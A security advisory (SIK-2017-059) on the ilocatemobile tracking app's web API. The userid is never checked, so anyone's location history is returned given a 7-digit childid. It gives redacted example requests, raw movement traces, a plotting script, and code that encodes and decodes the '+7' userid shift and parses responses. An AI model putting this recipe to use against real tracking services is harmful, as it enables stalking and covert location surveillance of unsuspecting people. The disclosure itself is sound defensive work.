SIK-2017-059


Title:

Location history of any user visible through a simple HTTP request in the ilocatemobile app

Report ID:

SIK-2017-059

Summary:

  • Vendor: www.ilocatemobile.com (India)
  • Product: com.ilocatemobile.track
  • Affected Version: Current web API, any version
  • Severity: high
  • Short summary: Anyone can be tracked given their ID (a 7-digit number); the userid parameter is not checked

Details:

Example requests (the location data returned below is our own):

http://****.net/****.aspx?userid=999=9%3C%3E&childid=2125290&currentdate=07/12/2017

Output:

1*49.8715330929084*8.639047788304*12:01 AM to 07:47 PM*49.8715330929084,8.639047788304*free$0*49.8731935027927*8.63498598738923*07:52 PM*49.8731935027927,8.63498598738923*free$2*49.871533247265*8.63904788614738*07:53 PM to 08:18 PM*49.871533247265,8.63904788614738*free$3*49.8746898716628*8.63132643123319*08:23 PM to 09:43 PM*49.8746898716628,8.63132643123319*free$0*49.869405647943*8.62696200749833*09:48 PM*49.869405647943,8.62696200749833*free$0*49.8666552314999*8.61016720534173*09:51 PM*49.8666552314999,8.61016720534173*free$0*49.8654873239886*8.59767123148795*09:55 PM*49.8654873239886,8.59767123148795*free$4*49.8641625311038*8.58813668917857*09:57 PM to 10:01 PM*49.8641625311038,8.58813668917857*free$5*49.8658166328809*8.60092130078582*10:06 PM to 10:08 PM*49.8658166328809,8.60092130078582*free$6*49.8680391649373*8.62167639644787*10:13 PM to 11:59 PM*49.8680391649373,8.62167639644787*free
http://****.net/****.aspx?userid=999=9%3C%3E&childid=2125290&currentdate=07/13/2017

Output:


1*49.8713574818857*8.63875187154788*12:01 AM to 03:32 PM*49.8713574818857,8.63875187154788*free$2*49.8599651360695*8.6492436015952*03:37 PM to 04:20 PM*49.8599651360695,8.6492436015952*free$3*49.8659017082034*8.64005715469628*04:25 PM to 04:42 PM*49.8659017082034,8.64005715469628*free$4*49.8607193174197*8.64766700537198*04:47 PM to 04:55 PM*49.8607193174197,8.64766700537198*free$5*49.8660906810819*8.63996964056536*05:00 PM to 05:29 PM*49.8660906810819,8.63996964056536*free$0*49.8621368320675*8.64791435318605*05:34 PM*49.8621368320675,8.64791435318605*free$0*49.8657520135618*8.63545893595093*05:34 PM*49.8657520135618,8.63545893595093*free$0*49.8730387486151*8.63354724178888*05:35 PM*49.8730387486151,8.63354724178888*free$0*49.8694975879708*8.64390203882139*05:35 PM*49.8694975879708,8.64390203882139*free$0*49.8628475343781*8.64071739596497*05:36 PM*49.8628475343781,8.64071739596497*free$0*49.8689428418663*8.64375591155705*05:36 PM*49.8689428418663,8.64375591155705*free$6*49.8677465395485*8.63267482540419*05:37 PM to 11:59 PM*49.8677465395485,8.63267482540419*free

Data visualization:

import re
import gmplot

# INPUT_DATA must hold the raw response text returned by the request above.
# Each record carries the coordinates a second time as "lat,lon"; we pull
# those pairs out with a regular expression.
regex = re.compile(r"\d+\.\d+,\d+\.\d+")
lats, lons = [], []
for p in regex.findall(INPUT_DATA):
    lat, lon = p.split(",")
    lats.append(float(lat))
    lons.append(float(lon))

# Centre the map on the area covered by the data (49.8, 8.6) at zoom level 8
# and plot every recorded position as a red marker.
gmap = gmplot.GoogleMapPlotter(49.8, 8.6, 8)
gmap.scatter(lats, lons, "red")
gmap.draw("map.html")

userid can be anything; results are always returned, so anyone can track anyone else. childid is the ID of the person being tracked. userid is "encrypted" with a Caesar cipher (shift of 7). currentdate is the day requested.
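The encoding and the response layout described above, as an added example that is not part of the original advisory. The decoder assumes the "+7" shift is applied to ASCII character codes (the page does not state this, but it is the reading under which the sample userid from the request above decodes to a 7-digit number, and it explains the '=', '<' and '>' characters). The sample response is the first three records of the 07/12/2017 output; the meaning of the leading numeric field in each record is not documented and is kept as an opaque index.

```python
from dataclasses import dataclass
from typing import List

SHIFT = 7  # the advisory describes userid as a "Caesar cipher + 7"


def decode_userid(encoded: str, shift: int = SHIFT) -> str:
    """Undo the shift by moving every character code back by `shift`.

    Assumption (not stated on the page): the shift acts on ASCII codes, so
    the digits 6, 5 and 7 become '=', '<' and '>' after encoding.
    """
    return "".join(chr(ord(c) - shift) for c in encoded)


def encode_userid(plain: str, shift: int = SHIFT) -> str:
    """Inverse of decode_userid: produce what the app sends as userid."""
    return "".join(chr(ord(c) + shift) for c in plain)


@dataclass
class Stop:
    index: int   # leading numeric field of the record; meaning undocumented
    lat: float
    lon: float
    time: str    # either a range "12:01 AM to 07:47 PM" or a single "07:52 PM"
    plan: str    # "free" in every record observed


def parse_response(body: str) -> List[Stop]:
    """Parse the '$'-separated records and their '*'-separated fields.

    Record layout as observed in the output above:
        <index>*<lat>*<lon>*<time or time range>*<lat>,<lon>*<plan>
    The fifth field repeats the coordinates; rather than trusting either
    copy blindly we reject records where the two copies disagree.
    """
    stops: List[Stop] = []
    for record in body.strip().split("$"):
        fields = record.split("*")
        if len(fields) != 6:
            raise ValueError(f"unexpected record layout: {record!r}")
        idx, lat, lon, when, pair, plan = fields
        if pair != f"{lat},{lon}":
            raise ValueError(f"coordinate fields disagree: {record!r}")
        stops.append(Stop(int(idx), float(lat), float(lon), when, plan))
    return stops


# Excerpt of the 07/12/2017 response shown above (first three records).
SAMPLE_RESPONSE = (
    "1*49.8715330929084*8.639047788304*12:01 AM to 07:47 PM"
    "*49.8715330929084,8.639047788304*free"
    "$0*49.8731935027927*8.63498598738923*07:52 PM"
    "*49.8731935027927,8.63498598738923*free"
    "$2*49.871533247265*8.63904788614738*07:53 PM to 08:18 PM"
    "*49.871533247265,8.63904788614738*free"
)

if __name__ == "__main__":
    # The userid sent in the request above, after URL decoding.
    print(decode_userid("999=9<>"))
    for stop in parse_response(SAMPLE_RESPONSE):
        print(f"{stop.time:>22}  {stop.lat:.6f},{stop.lon:.6f}")
```

Running it shows why the shift offers no protection: the userid decodes to a plain 7-digit number of the same shape as the childid in the request, and the response parses into a per-day movement trace without any credential being involved.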

The IDs are short numeric values (7 digits in the example) and could easily be brute-forced. Also, the requests are plain HTTP, so traffic could easily be sniffed to acquire user IDs.

Workaround

Suggested Mitigation

Use HTTPS, authenticate every request and only return a child's data to users who are authorized for that child, and replace the Caesar shift with real encryption.

Timeline

  • 2017-08-31: Vulnerability discovered
  • 2017-09-01: First contact email sent to developer
  • 2018-08-11: Published